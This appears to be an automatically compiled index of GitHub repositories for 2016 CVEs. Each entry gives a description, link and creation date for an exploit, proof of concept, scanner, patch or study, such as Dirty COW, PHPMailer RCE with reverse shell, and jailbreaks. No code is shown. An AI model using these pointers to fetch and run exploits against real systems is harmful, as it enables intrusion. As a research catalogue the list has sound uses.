**Linux af_packet.c race condition (local root)** : [KosukeShimofuji/CVE-2016-8655](https://api.github.com/repos/KosukeShimofuji/CVE-2016-8655) create time: 2016-12-09T02:54:17Z

**Dirty COW (CVE-2016-5195) vulnerability testing utility for Linux-based systems.** : [sideeffect42/DirtyCOWTester](https://api.github.com/repos/sideeffect42/DirtyCOWTester) create time: 2016-10-22T07:51:18Z

**Proof of concept for CVE-2016-9192.** : [serializingme/cve-2016-9192](https://api.github.com/repos/serializingme/cve-2016-9192) create time: 2016-12-20T18:32:53Z

**CVE-2016-8610 (SSL Death Alert) PoC** : [cujanovic/CVE-2016-8610-PoC](https://api.github.com/repos/cujanovic/CVE-2016-8610-PoC) create time: 2016-12-27T10:09:43Z

**Puppet module to find Vulnerability of CVE 2016 5195 ** : [nndhanasekaran/redhat_cve2016](https://api.github.com/repos/nndhanasekaran/redhat_cve2016) create time: 2016-12-28T11:42:15Z

**Prevent PHP vulnerabilities similar to CVE-2016-10033 and CVE-2016-10045.** : [Zenexer/safeshell](https://api.github.com/repos/Zenexer/safeshell) create time: 2016-12-29T08:29:20Z

**Exploiting PHPMail with back connection (reverse shell) from the target** : [paralelo14/CVE_2016-10033](https://api.github.com/repos/paralelo14/CVE_2016-10033) create time: 2016-12-29T13:49:36Z

**None** : [linhlt247/DirtyCOW_CVE-2016-5195](https://api.github.com/repos/linhlt247/DirtyCOW_CVE-2016-5195) create time: 2017-01-02T16:50:49Z

**Proof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201)** : [theori-io/chakra-2016-11](https://api.github.com/repos/theori-io/chakra-2016-11) create time: 2017-01-04T23:41:27Z

**Pixel bootlaoder exploit for reading flash storage** : [CunningLogic/PixelDump_CVE-2016-8462](https://api.github.com/repos/CunningLogic/PixelDump_CVE-2016-8462) create time: 2016-10-28T16:26:18Z

**Roundcube 1.0.0 <= 1.2.2 Remote Code Execution exploit and vulnerable container** : [t0kx/exploit-CVE-2016-9920](https://api.github.com/repos/t0kx/exploit-CVE-2016-9920) create time: 2017-01-06T17:55:44Z

**This app checks if you're vulnerable to CVE-2016-8467 and/or if your bootmode property has been tampered with.** : [roeeh/bootmodechecker](https://api.github.com/repos/roeeh/bootmodechecker) create time: 2017-01-08T12:14:57Z

**Proof-of-concept exploit for CVE-2016-1827 on OS X Yosemite.** : [bazad/flow_divert-heap-overflow](https://api.github.com/repos/bazad/flow_divert-heap-overflow) create time: 2017-01-10T03:41:56Z

**Reproducible exploits for: CVE-2016-1240 CVE-2008-2938 CVE-2014-2064 CVE-2014-1904** : [Naramsim/Offensive](https://api.github.com/repos/Naramsim/Offensive) create time: 2016-10-13T13:46:46Z

**Android App that removes amazon ads on the lockscreen on motorolla phones using exploit CVE 2016 5195** : [martinmullins/amazon_remove_ads_apk](https://api.github.com/repos/martinmullins/amazon_remove_ads_apk) create time: 2017-01-12T01:06:12Z

**None** : [heh3/CVE-2016-7255](https://api.github.com/repos/heh3/CVE-2016-7255) create time: 2017-01-13T15:49:58Z

**None** : [sribaba/android-CVE-2016-5195](https://api.github.com/repos/sribaba/android-CVE-2016-5195) create time: 2017-01-15T03:56:27Z

**Local privilege escalation through macOS 10.12.1 via CVE-2016-1825 or CVE-2016-7617.** : [bazad/physmem](https://api.github.com/repos/bazad/physmem) create time: 2016-12-25T05:07:22Z

**Android APK Based On Public Information Using DirtyCOW CVE-2016-5195 Exploit** : [esc0rtd3w/org.cowpoop.moooooo](https://api.github.com/repos/esc0rtd3w/org.cowpoop.moooooo) create time: 2017-01-16T10:41:26Z

**None** : [nu11secur1ty/Protect-CVE-2016-5195-DirtyCow](https://api.github.com/repos/nu11secur1ty/Protect-CVE-2016-5195-DirtyCow) create time: 2017-01-19T13:36:58Z

**Proof of concept CVE-2016-2098** : [Alejandro-MartinG/rails-PoC-CVE-2016-2098](https://api.github.com/repos/Alejandro-MartinG/rails-PoC-CVE-2016-2098) create time: 2017-01-25T23:42:31Z

**CVE-2016-5195 (Dirty COW) PoC for Android 6.0.1 Marshmallow** : [hyln9/VIKIROOT](https://api.github.com/repos/hyln9/VIKIROOT) create time: 2017-01-20T05:28:04Z

**vagrant box exploiting cve-2016-0728** : [sibilleg/exploit_cve-2016-0728](https://api.github.com/repos/sibilleg/exploit_cve-2016-0728) create time: 2017-01-27T15:45:35Z

**Exploit of the CVE-2016-1494 allowing to forge signatures of RSA keys with low exponents** : [matthiasbe/secuimag3a](https://api.github.com/repos/matthiasbe/secuimag3a) create time: 2016-12-02T09:32:02Z

**不完美的利用代码,只能用于学习:)** : [i-o-s/CVE-2016-4669](https://api.github.com/repos/i-o-s/CVE-2016-4669) create time: 2017-02-21T08:15:18Z

**Exploits CVE-2016-5640 / CLVA-2016-05-002 against Crestron AM-100** : [vpnguy-zz/CrestCrack](https://api.github.com/repos/vpnguy-zz/CrestCrack) create time: 2017-02-07T19:42:06Z

**This is a tool for exploiting Ticketbleed (CVE-2016-9244) vulnerability.** : [EgeBalci/Ticketbleed](https://api.github.com/repos/EgeBalci/Ticketbleed) create time: 2017-02-10T10:21:15Z

**Minion plugin for checking Ticketbleed (CVE-2016-9244)** : [glestel/minion-ticket-bleed-plugin](https://api.github.com/repos/glestel/minion-ticket-bleed-plugin) create time: 2017-02-10T13:17:01Z

**A brief report on CVE-2016-4117 (A vulnerability in Adobe Flash)** : [amit-raut/CVE-2016-4117-Report](https://api.github.com/repos/amit-raut/CVE-2016-4117-Report) create time: 2017-02-23T15:00:10Z

**PoC for Dirty COW (CVE-2016-5195)** : [scumjr/dirtycow-vdso](https://api.github.com/repos/scumjr/dirtycow-vdso) create time: 2016-10-22T15:25:34Z

**An exploit for CVE-2016-7255 on Windows 7/8/8.1/10(pre-anniversary) 64 bit** : [FSecureLABS/CVE-2016-7255](https://api.github.com/repos/FSecureLABS/CVE-2016-7255) create time: 2017-03-02T23:32:08Z

**MS16-032(CVE-2016-0099) for SERVICE ONLY** : [zcgonvh/MS16-032](https://api.github.com/repos/zcgonvh/MS16-032) create time: 2017-03-15T17:16:55Z

**Verification tools for CVE-2016-1287** : [NetSPI/asa_tools](https://api.github.com/repos/NetSPI/asa_tools) create time: 2016-09-08T19:43:18Z

**CVE-2016-4657 for NintendoSwitch rwx** : [Mimoja/CVE-2016-4657-NintendoSwitch](https://api.github.com/repos/Mimoja/CVE-2016-4657-NintendoSwitch) create time: 2017-03-13T13:08:17Z

**code for webkit exploit, Nintendo Switch** : [Traiver/CVE-2016-4657-Switch-Browser-Binary](https://api.github.com/repos/Traiver/CVE-2016-4657-Switch-Browser-Binary) create time: 2017-03-17T01:39:57Z

**CVE-2016-5195 dirtycow by timwr automated multi file patch tool** : [droidvoider/dirtycow-replacer](https://api.github.com/repos/droidvoider/dirtycow-replacer) create time: 2017-03-18T03:21:02Z

**Exploit code for CVE-2016-9066** : [saelo/foxpwn](https://api.github.com/repos/saelo/foxpwn) create time: 2017-03-10T20:08:13Z

**None** : [boompig/cve-2016-6662](https://api.github.com/repos/boompig/cve-2016-6662) create time: 2017-03-19T23:36:41Z

**A CVE-2016-5195 exploit example.** : [gbonacini/CVE-2016-5195](https://api.github.com/repos/gbonacini/CVE-2016-5195) create time: 2016-10-23T00:16:33Z

**A demo server for CVE-2016-3955 (UBOAT)** : [pqsec/uboatdemo](https://api.github.com/repos/pqsec/uboatdemo) create time: 2017-03-29T05:05:41Z

**None** : [HaToan/CVE-2016-2173](https://api.github.com/repos/HaToan/CVE-2016-2173) create time: 2017-03-29T01:25:40Z

**PoC for CVE-2016-5345** : [NickStephens/cve-2016-5345](https://api.github.com/repos/NickStephens/cve-2016-5345) create time: 2017-04-15T01:08:22Z

**None** : [homjxi0e/CVE-2016-7255](https://api.github.com/repos/homjxi0e/CVE-2016-7255) create time: 2017-04-15T01:46:52Z

**global rate-limiting in Linux (CVE-2016-5696) scanner** : [nogoegst/grill](https://api.github.com/repos/nogoegst/grill) create time: 2016-12-07T18:40:47Z

**A rebuilt version of the exploit for CVE-2016-1542 and CVE-2016-1543 from insinuator.net** : [patriknordlen/bladelogic_bmc-cve-2016-1542](https://api.github.com/repos/patriknordlen/bladelogic_bmc-cve-2016-1542) create time: 2017-04-27T09:16:01Z

**RCE against WordPress 4.6; Python port of https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html** : [GeneralTesler/CVE-2016-10033](https://api.github.com/repos/GeneralTesler/CVE-2016-10033) create time: 2017-05-10T03:18:46Z

**Create a docker container with vulnerable imagemagick and node app to demonstrate what CVE 2016-3714 is ** : [mike-williams/imagetragick-poc](https://api.github.com/repos/mike-williams/imagetragick-poc) create time: 2017-05-16T20:25:58Z

**WordPress 4.6 - Remote Code Execution (RCE) PoC Exploit** : [Bajunan/CVE-2016-10033](https://api.github.com/repos/Bajunan/CVE-2016-10033) create time: 2017-05-19T12:52:21Z

**cve-2016-0728 exploit and summary** : [hal0taso/CVE-2016-0728](https://api.github.com/repos/hal0taso/CVE-2016-0728) create time: 2017-05-16T06:37:19Z

**Code and vulnerable WordPress container for exploiting CVE-2016-10033** : [chipironcin/CVE-2016-10033](https://api.github.com/repos/chipironcin/CVE-2016-10033) create time: 2017-05-10T12:01:07Z

**os experiment 4 CVE-2016-5195 ** : [FloridSleeves/os-experiment-4](https://api.github.com/repos/FloridSleeves/os-experiment-4) create time: 2017-06-16T13:53:46Z

**None** : [qwertyuiop12138/CVE-2016-10033](https://api.github.com/repos/qwertyuiop12138/CVE-2016-10033) create time: 2017-06-28T07:09:54Z

**Android attempt at PoC CVE-2016-8655** : [martinmullins/CVE-2016-8655_Android](https://api.github.com/repos/martinmullins/CVE-2016-8655_Android) create time: 2016-12-17T19:14:01Z

**PHPMailer < 5.2.18 Remote Code Execution** : [heikipikker/exploit-CVE-2016-10034](https://api.github.com/repos/heikipikker/exploit-CVE-2016-10034) create time: 2017-10-17T07:25:06Z

**Proof of concept for ZRTP man-in-the-middle** : [gteissier/CVE-2016-6271](https://api.github.com/repos/gteissier/CVE-2016-6271) create time: 2017-07-21T22:57:04Z

**None** : [liusec/WP-CVE-2016-10033](https://api.github.com/repos/liusec/WP-CVE-2016-10033) create time: 2017-07-22T03:20:41Z

**From SQL injection to root shell with CVE-2016-6662 by MaYaSeVeN** : [MAYASEVEN/CVE-2016-6662](https://api.github.com/repos/MAYASEVEN/CVE-2016-6662) create time: 2017-05-01T08:51:08Z

**Automated Exploit Toolkit for CVE-2015-6095 and CVE-2016-0049** : [JackOfMostTrades/bluebox](https://api.github.com/repos/JackOfMostTrades/bluebox) create time: 2016-02-18T22:38:51Z

**Exploit for Jenkins serialization vulnerability - CVE-2016-0792** : [jpiechowka/jenkins-cve-2016-0792](https://api.github.com/repos/jpiechowka/jenkins-cve-2016-0792) create time: 2017-07-30T18:39:24Z

**None** : [kavgan/vuln_test_repo_public_ruby_gemfile_cve-2016-6317](https://api.github.com/repos/kavgan/vuln_test_repo_public_ruby_gemfile_cve-2016-6317) create time: 2017-09-26T16:42:26Z

**CVE-2016-7608: Buffer overflow in IOFireWireFamily.** : [bazad/IOFireWireFamily-overflow](https://api.github.com/repos/bazad/IOFireWireFamily-overflow) create time: 2017-08-19T20:49:26Z

**Motorola Untethered Jailbreak: Exploiting CVE-2016-10277 for Secure Boot and Device Locking bypass ** : [alephsecurity/initroot](https://api.github.com/repos/alephsecurity/initroot) create time: 2017-06-06T12:00:27Z

**CVE-2016-0034 Decompile** : [DiamondHunters/CVE-2016-0034-Decompile](https://api.github.com/repos/DiamondHunters/CVE-2016-0034-Decompile) create time: 2017-10-12T07:52:08Z

**Exploits for the win32kfull!bFill vulnerability on Win10 x64 RS2 using Bitmap or Palette techniques** : [siberas/CVE-2016-3309_Reloaded](https://api.github.com/repos/siberas/CVE-2016-3309_Reloaded) create time: 2017-10-06T07:59:07Z

**frp bypass without account overwrite** : [maviroxz/CVE-2016-8776](https://api.github.com/repos/maviroxz/CVE-2016-8776) create time: 2017-10-08T12:26:23Z

**Ready to use, weaponized dirtycow (CVE-2016-5195)** : [arbll/dirtycow](https://api.github.com/repos/arbll/dirtycow) create time: 2017-10-11T14:07:28Z

**Apache HTTP Server 2.4.23 vulnerability study (CVE-2016-8740)** : [lcfpadilha/mac0352-ep4](https://api.github.com/repos/lcfpadilha/mac0352-ep4) create time: 2017-10-11T23:42:49Z

**Dirty COW (CVE-2016-5195) Testing** : [titanhp/Dirty-COW-CVE-2016-5195-Testing](https://api.github.com/repos/titanhp/Dirty-COW-CVE-2016-5195-Testing) create time: 2017-10-19T02:04:50Z

**OpenSSH remote DOS exploit and vulnerable container** : [opsxcq/exploit-CVE-2016-6515](https://api.github.com/repos/opsxcq/exploit-CVE-2016-6515) create time: 2016-12-09T15:22:38Z

**NTPD remote DOS exploit and vulnerable container** : [opsxcq/exploit-CVE-2016-7434](https://api.github.com/repos/opsxcq/exploit-CVE-2016-7434) create time: 2016-11-22T19:42:17Z

**Exploits CVE-2016-10033 and CVE-2016-10045** : [pedro823/cve-2016-10033-45](https://api.github.com/repos/pedro823/cve-2016-10033-45) create time: 2017-11-19T19:31:45Z

**Exploiting CVE-2016-2334 7zip HFS+ vulnerability** : [icewall/CVE-2016-2334](https://api.github.com/repos/icewall/CVE-2016-2334) create time: 2017-11-27T15:36:50Z

**CVE-2016-4117** : [hybridious/CVE-2016-4117](https://api.github.com/repos/hybridious/CVE-2016-4117) create time: 2018-02-15T22:05:08Z

**None** : [acidburnmi/CVE-2016-5195-master](https://api.github.com/repos/acidburnmi/CVE-2016-5195-master) create time: 2017-12-06T17:36:19Z

**Exploiting CVE-2016-4657 to JailBreak the Nintendo Switch** : [iDaN5x/Switcheroo](https://api.github.com/repos/iDaN5x/Switcheroo) create time: 2017-06-02T10:54:27Z

**To solve CTFS.me problem** : [awidardi/opsxcq-cve-2016-10033](https://api.github.com/repos/awidardi/opsxcq-cve-2016-10033) create time: 2018-02-06T08:59:14Z

**PHPMailer < 5.2.18 Remote Code Execution Exploit ** : [0x00-0x00/CVE-2016-10033](https://api.github.com/repos/0x00-0x00/CVE-2016-10033) create time: 2018-02-09T14:53:51Z

**Ruby On Rails unrestricted render() exploit** : [0x00-0x00/CVE-2016-2098](https://api.github.com/repos/0x00-0x00/CVE-2016-2098) create time: 2018-02-09T16:16:08Z

**Squid 3.x before 3.5.15 and 4.x before 4.0.7 does not properly append data to String objects, which allows remote servers to cause a denial of service (assertion failure and daemon exit) via a long string, as demonstrated by a crafted HTTP Vary header.** : [amit-raut/CVE-2016-2569](https://api.github.com/repos/amit-raut/CVE-2016-2569) create time: 2018-02-03T20:47:08Z

**ChakraCore exploitation techniques** : [0xcl/cve-2016-7190](https://api.github.com/repos/0xcl/cve-2016-7190) create time: 2018-02-13T20:35:04Z

**An demonstration of how to exploit double-fetch vulnerability CVE-2016-6516** : [wpengfei/CVE-2016-6516-exploit](https://api.github.com/repos/wpengfei/CVE-2016-6516-exploit) create time: 2017-12-07T01:55:39Z

**Exploit for Jenkins serialization vulnerability - CVE-2016-0792** : [s0wr0b1ndef/java-deserialization-exploits](https://api.github.com/repos/s0wr0b1ndef/java-deserialization-exploits) create time: 2018-03-13T09:15:32Z

**None** : [nirdev/CVE-2016-3749-PoC](https://api.github.com/repos/nirdev/CVE-2016-3749-PoC) create time: 2018-03-18T16:16:42Z

**None** : [zi0Black/CVE-2016-010033-010045](https://api.github.com/repos/zi0Black/CVE-2016-010033-010045) create time: 2018-02-12T09:09:42Z

**Example exploit for CVE-2016-5195** : [xpcmdshell/derpyc0w](https://api.github.com/repos/xpcmdshell/derpyc0w) create time: 2018-04-11T19:38:13Z

**编译好的脏牛漏洞(CVE-2016-5195)EXP** : [Brucetg/DirtyCow-EXP](https://api.github.com/repos/Brucetg/DirtyCow-EXP) create time: 2018-05-27T08:06:50Z

**CVE-2016-0040 Privilege Escalation Exploit For WMI Receive Notification Vulnerability (x86-64)** : [de7ec7ed/CVE-2016-0040](https://api.github.com/repos/de7ec7ed/CVE-2016-0040) create time: 2017-08-03T22:28:54Z

**A demonstration of how page tables can be used to run arbitrary code in ring-0 and lead to a privesc. Uses CVE-2016-7255 as an example.** : [yuvatia/page-table-exploitation](https://api.github.com/repos/yuvatia/page-table-exploitation) create time: 2018-06-09T23:14:07Z

**Proof of concept for CVE-2016-4463** : [arntsonl/CVE-2016-4463](https://api.github.com/repos/arntsonl/CVE-2016-4463) create time: 2018-07-10T21:10:35Z

**A demo exploit of CVE-2016-9079 on Ubuntu x64** : [dangokyo/CVE-2016-9079](https://api.github.com/repos/dangokyo/CVE-2016-9079) create time: 2018-07-29T12:55:27Z

**WordPress plugin for ImageTragick (CVE-2016–3714) proof of concept** : [artfreyr/wp-imagetragick](https://api.github.com/repos/artfreyr/wp-imagetragick) create time: 2018-06-07T13:07:36Z

**porting CVE-2016-7255 to x86 for educational purposes.** : [bbolmin/cve-2016-7255_x86_x64](https://api.github.com/repos/bbolmin/cve-2016-7255_x86_x64) create time: 2018-09-13T12:47:29Z

**Proof of concept for CVE-2016-8858** : [dag-erling/kexkill](https://api.github.com/repos/dag-erling/kexkill) create time: 2016-11-03T16:10:47Z

**Cross-site request forgery (CSRF) ** : [TSNGL21/CVE-2016-6801](https://api.github.com/repos/TSNGL21/CVE-2016-6801) create time: 2018-10-27T10:26:41Z

** CVE-2016-4657 web-kit vulnerability for ios 9.3, nintendo switch browser vulnerability ** : [vigneshyaadav27/webkit-vulnerability](https://api.github.com/repos/vigneshyaadav27/webkit-vulnerability) create time: 2018-11-11T14:22:18Z

**None** : [tafamace/CVE-2016-0793](https://api.github.com/repos/tafamace/CVE-2016-0793) create time: 2018-11-19T08:40:58Z

**None** : [tafamace/CVE-2016-4438](https://api.github.com/repos/tafamace/CVE-2016-4438) create time: 2018-11-19T08:49:25Z

**None** : [tafamace/CVE-2016-6798](https://api.github.com/repos/tafamace/CVE-2016-6798) create time: 2018-11-19T08:59:42Z

**Metasploit module for CVE-2016-1555** : [ide0x90/cve-2016-1555](https://api.github.com/repos/ide0x90/cve-2016-1555) create time: 2018-10-06T03:52:23Z

**This is an exploitation guide for CVE-2016-2233** : [fath0218/CVE-2016-2233](https://api.github.com/repos/fath0218/CVE-2016-2233) create time: 2018-12-03T02:55:06Z

**CVE-2016-1240 exploit and patch** : [mhe18/CVE_Project](https://api.github.com/repos/mhe18/CVE_Project) create time: 2018-12-02T19:35:28Z

**Group Project S&P** : [msharm33/CVE2016-5734](https://api.github.com/repos/msharm33/CVE2016-5734) create time: 2018-11-28T15:34:24Z

**A reproducible environment with flag challenges for CVE-2016-3714 ** : [HRSkraps/CVE-2016-3714](https://api.github.com/repos/HRSkraps/CVE-2016-3714) create time: 2018-12-06T13:23:05Z

**A collection of code pertaining to CVE-2016-0728 (various authors)** : [sugarvillela/CVE](https://api.github.com/repos/sugarvillela/CVE) create time: 2018-12-03T00:15:23Z

**Integer Overflow (CyberSecurity | UMCP 2018) . This involves exploiting integer overflow vulnerability present in mem_check function of infiniband Soft RoCE implemetation (Ref: CVE-2016-8636). It also exploring Pwnie Adventure island (Reference: LiveOverflow)** : [jigerjain/Integer-Overflow-test](https://api.github.com/repos/jigerjain/Integer-Overflow-test) create time: 2018-12-11T20:30:31Z

**web2py/web2py @ e94946d** : [sj/web2py-e94946d-CVE-2016-3957](https://api.github.com/repos/sj/web2py-e94946d-CVE-2016-3957) create time: 2018-12-19T16:55:03Z

**None** : [nardholio/cve-2016-0728](https://api.github.com/repos/nardholio/cve-2016-0728) create time: 2016-01-22T03:52:11Z

**McAfee Virus Scan for Linux multiple remote flaws (CVE 2016-8016, CVE 2016-8017, CVE 2016-8018, CVE 2016-8019, CVE 2016-8020, CVE 2016-8021, CVE 2016-8022, CVE 2016-8023, CVE 2016-8024, CVE 2016-8025)** : [opsxcq/exploit-CVE-2016-8016-25](https://api.github.com/repos/opsxcq/exploit-CVE-2016-8016-25) create time: 2016-12-13T21:25:05Z

**CVE-2016-4971 Wget 1.18/1.14-13.el7 Client Exploit** : [mbadanoiu/CVE-2016-4971](https://api.github.com/repos/mbadanoiu/CVE-2016-4971) create time: 2019-01-05T15:50:52Z

**cve-2016-8869** : [cved-sources/cve-2016-8869](https://api.github.com/repos/cved-sources/cve-2016-8869) create time: 2019-01-11T21:00:52Z

**cve-2016-8870** : [cved-sources/cve-2016-8870](https://api.github.com/repos/cved-sources/cve-2016-8870) create time: 2019-01-11T21:08:27Z

**Shortest Path Bridging (SPB-Mac) vulnerability testing scripts. Used in a network pentest to enumerate a new vuln (CVE-2016-2783) in Avaya VOSS Ethernet switches.** : [iknowjason/spb](https://api.github.com/repos/iknowjason/spb) create time: 2019-01-17T14:35:11Z

**cve-2016-10033** : [cved-sources/cve-2016-10033](https://api.github.com/repos/cved-sources/cve-2016-10033) create time: 2019-01-17T17:20:24Z

**cve-2016-6515** : [cved-sources/cve-2016-6515](https://api.github.com/repos/cved-sources/cve-2016-6515) create time: 2019-01-06T22:07:47Z

**cve-2016-7434** : [cved-sources/cve-2016-7434](https://api.github.com/repos/cved-sources/cve-2016-7434) create time: 2019-01-06T22:15:24Z

**8.4.1 Jailbreak using CVE-2016-4655 / CVE-2016-4656** : [Cryptiiiic/skybreak](https://api.github.com/repos/Cryptiiiic/skybreak) create time: 2018-01-09T07:44:50Z

**None** : [stigtsp/CVE-2018-20162-digi-lr54-restricted-shell-escape](https://api.github.com/repos/stigtsp/CVE-2018-20162-digi-lr54-restricted-shell-escape) create time: 2019-02-14T02:20:13Z

**Simple test for the May 2016 OpenSSL padding oracle (CVE-2016-2107)** : [FiloSottile/CVE-2016-2107](https://api.github.com/repos/FiloSottile/CVE-2016-2107) create time: 2016-05-03T16:47:32Z

**windows 7 Ultimate Ultimate x64 poc of cve-2016-0095(MS16-034)** : [fengjixuchui/cve-2016-0095-x64](https://api.github.com/repos/fengjixuchui/cve-2016-0095-x64) create time: 2019-03-21T09:33:19Z

**cve-2016-9838** : [cved-sources/cve-2016-9838](https://api.github.com/repos/cved-sources/cve-2016-9838) create time: 2019-03-27T17:47:12Z

**Exploiting CVE-2016-10277 for Secure Boot and Device Locking bypass** : [leosol/initroot](https://api.github.com/repos/leosol/initroot) create time: 2019-02-04T21:12:56Z

**My first iOS 'jailbreak' , using CVE 2016-4655 & CVE 2016-4656** : [tomitokics/br0ke](https://api.github.com/repos/tomitokics/br0ke) create time: 2019-06-16T18:02:09Z

**Zapierd-test** : [ISSAPolska/CVE-2016-10761](https://api.github.com/repos/ISSAPolska/CVE-2016-10761) create time: 2019-06-30T08:27:15Z

**Whitepaper for CVE-2016-3238/MS16-087 Proof Of concept.** : [pyiesone/CVE-2016-3238-PoC](https://api.github.com/repos/pyiesone/CVE-2016-3238-PoC) create time: 2019-07-05T06:49:09Z

**cve-2016-6187** : [vnik5287/cve-2016-6187-poc](https://api.github.com/repos/vnik5287/cve-2016-6187-poc) create time: 2019-07-23T12:30:02Z

**Linux 本地提权漏洞** : [jas502n/CVE-2016-5195](https://api.github.com/repos/jas502n/CVE-2016-5195) create time: 2019-08-13T10:38:49Z

**OpenSSH Username Enumeration - CVE-2016-6210** : [justlce/CVE-2016-6210-Exploit](https://api.github.com/repos/justlce/CVE-2016-6210-Exploit) create time: 2019-08-25T07:23:44Z

**None** : [Lynggaard91/windows2016fixCVE-2017-8529](https://api.github.com/repos/Lynggaard91/windows2016fixCVE-2017-8529) create time: 2019-09-03T20:39:59Z

**An implementation of CVE-2016-0974 for the Nintendo Wii.** : [Fullmetal5/FlashHax](https://api.github.com/repos/Fullmetal5/FlashHax) create time: 2018-04-01T00:39:28Z

**PHPMailer < 5.2.18 Remote Code Execution exploit and vulnerable container** : [opsxcq/exploit-CVE-2016-10033](https://api.github.com/repos/opsxcq/exploit-CVE-2016-10033) create time: 2016-12-26T13:39:03Z

**CVE-2016-2098 simple POC written in bash** : [its-arun/CVE-2016-2098](https://api.github.com/repos/its-arun/CVE-2016-2098) create time: 2018-06-19T07:05:51Z

**脏牛Linux本地提权漏洞复现(CVE-2016-5195)** : [imust6226/dirtcow](https://api.github.com/repos/imust6226/dirtcow) create time: 2019-10-22T07:18:06Z

**None** : [3rg1s/CVE-2016-2098](https://api.github.com/repos/3rg1s/CVE-2016-2098) create time: 2019-10-30T12:36:38Z

**None** : [dmaasland/mcafee-hip-CVE-2016-8007](https://api.github.com/repos/dmaasland/mcafee-hip-CVE-2016-8007) create time: 2019-11-12T19:23:05Z

**Crestron AirMedia AM-100 RCE (CVE-2016-5640) Metasploit Module** : [xfox64x/CVE-2016-5640](https://api.github.com/repos/xfox64x/CVE-2016-5640) create time: 2018-08-01T14:52:33Z

**Crestron AirMedia AM-100 Traversal and Hashdump Metasploit Modules** : [xfox64x/CVE-2016-5639](https://api.github.com/repos/xfox64x/CVE-2016-5639) create time: 2018-08-01T14:59:09Z

**None** : [ianxtianxt/CVE-2016-8735](https://api.github.com/repos/ianxtianxt/CVE-2016-8735) create time: 2020-01-29T11:12:37Z

**None** : [N0b1e6/CVE-2016-4977-POC](https://api.github.com/repos/N0b1e6/CVE-2016-4977-POC) create time: 2020-02-17T09:54:50Z

**CVE-2020-8012, CVE-2016-10709, CVE-2017-17099, CVE-2017-18047, CVE-2019-1003000, CVE-2018-1999002** : [wetw0rk/Exploit-Development](https://api.github.com/repos/wetw0rk/Exploit-Development) create time: 2017-04-26T02:03:43Z

**None** : [VVzv/CVE-2016-3088](https://api.github.com/repos/VVzv/CVE-2016-3088) create time: 2020-04-04T06:50:28Z

**My journey through WebKit CVE-2016-4622 Exploitation process** : [hdbreaker/WebKit-CVE-2016-4622](https://api.github.com/repos/hdbreaker/WebKit-CVE-2016-4622) create time: 2020-04-07T00:46:19Z

**BMC Bladelogic RSCD exploits including remote code execution - CVE-2016-1542, CVE-2016-1543, CVE-2016-5063** : [bao7uo/bmc_bladelogic](https://api.github.com/repos/bao7uo/bmc_bladelogic) create time: 2018-01-24T16:03:22Z

**None** : [shanuka-ashen/Dirty-Cow-Explanation-CVE-2016-5195-](https://api.github.com/repos/shanuka-ashen/Dirty-Cow-Explanation-CVE-2016-5195-) create time: 2020-05-11T19:25:26Z

**This is a Dirty Cow (CVE-2016-5195) privilege escalation vulnerability exploit** : [dulanjaya23/Dirty-Cow-CVE-2016-5195-](https://api.github.com/repos/dulanjaya23/Dirty-Cow-CVE-2016-5195-) create time: 2020-05-12T17:10:38Z

**None** : [dinidhu96/IT19013756_-CVE-2016-4971-](https://api.github.com/repos/dinidhu96/IT19013756_-CVE-2016-4971-) create time: 2020-05-12T17:32:46Z

**this is an individual assignment for system network programming ** : [sandeeparth07/CVE-2016_5195-vulnarability](https://api.github.com/repos/sandeeparth07/CVE-2016_5195-vulnarability) create time: 2020-05-12T17:32:48Z

**Document on Linux Kernal Vulnerability CVE-2016-0728 and Exploitation** : [th30d00r/Linux-Vulnerability-CVE-2016-0728-and-Exploit](https://api.github.com/repos/th30d00r/Linux-Vulnerability-CVE-2016-0728-and-Exploit) create time: 2020-05-12T21:30:26Z

**None** : [HKirito/phpmyadmin4.4_cve-2016-5734](https://api.github.com/repos/HKirito/phpmyadmin4.4_cve-2016-5734) create time: 2020-05-22T02:37:42Z

**CVE-2016-4437-Shiro反序列化爆破模块和key,命令执行,反弹shell的脚本** : [bkfish/Awesome_shiro](https://api.github.com/repos/bkfish/Awesome_shiro) create time: 2020-05-27T05:02:04Z

**Dirtycow also is known as CVE-2016-5195** : [KaviDk/dirtyCow](https://api.github.com/repos/KaviDk/dirtyCow) create time: 2020-05-12T20:38:07Z

**This exploit is remote code execution vulnerability in Ruby-on-Rails when using render on user-supplied data** : [danielhemmati/CVE-2016-2098-my-first-exploit](https://api.github.com/repos/danielhemmati/CVE-2016-2098-my-first-exploit) create time: 2020-07-27T11:38:48Z

**ActiveMQ_putshell直接获取webshell** : [gsheller/ActiveMQ_putshell-CVE-2016-3088](https://api.github.com/repos/gsheller/ActiveMQ_putshell-CVE-2016-3088) create time: 2020-07-31T09:06:15Z

**CVE-2016-2555** : [shadofren/CVE-2016-2555](https://api.github.com/repos/shadofren/CVE-2016-2555) create time: 2020-08-09T22:15:43Z

**CVE-2016-5636** : [insuyun/CVE-2016-5636](https://api.github.com/repos/insuyun/CVE-2016-5636) create time: 2016-03-28T18:47:03Z

**CVE-2016-4010** : [shadofren/CVE-2016-4010](https://api.github.com/repos/shadofren/CVE-2016-4010) create time: 2020-08-10T14:17:56Z

**None** : [hhj4ck/CVE-2016-2067](https://api.github.com/repos/hhj4ck/CVE-2016-2067) create time: 2020-08-10T23:22:27Z

**CVE-2015-4852、CVE-2016-0638、CVE-2016-3510、CVE-2019-2890漏洞POC** : [zhzhdoai/Weblogic_Vuln](https://api.github.com/repos/zhzhdoai/Weblogic_Vuln) create time: 2020-08-10T09:17:04Z

**[CVE-2016-2386] SAP NetWeaver AS JAVA UDDI Component SQL Injection** : [murataydemir/CVE-2016-2386](https://api.github.com/repos/murataydemir/CVE-2016-2386) create time: 2020-08-13T12:07:09Z

**[CVE-2016-4014] SAP Netweaver AS JAVA UDDI Component XML External Entity (XXE)** : [murataydemir/CVE-2016-4014](https://api.github.com/repos/murataydemir/CVE-2016-4014) create time: 2020-08-13T11:51:37Z

**Re-implementation of VirtueSecurity's benigncertain-monitor** : [3ndG4me/CVE-2016-6415-BenignCertain-Monitor](https://api.github.com/repos/3ndG4me/CVE-2016-6415-BenignCertain-Monitor) create time: 2020-11-04T20:08:14Z

**A proof of concept to exploit the reflected XSS vulnerability in the oVirt web interface (RedHat). In this PoC a VM in the oVirt IaaS environment is to be started via the victim's browser session. JS code has been kept simple due to the rush.** : [0xEmanuel/CVE-2016-3113](https://api.github.com/repos/0xEmanuel/CVE-2016-3113) create time: 2020-03-01T22:17:31Z

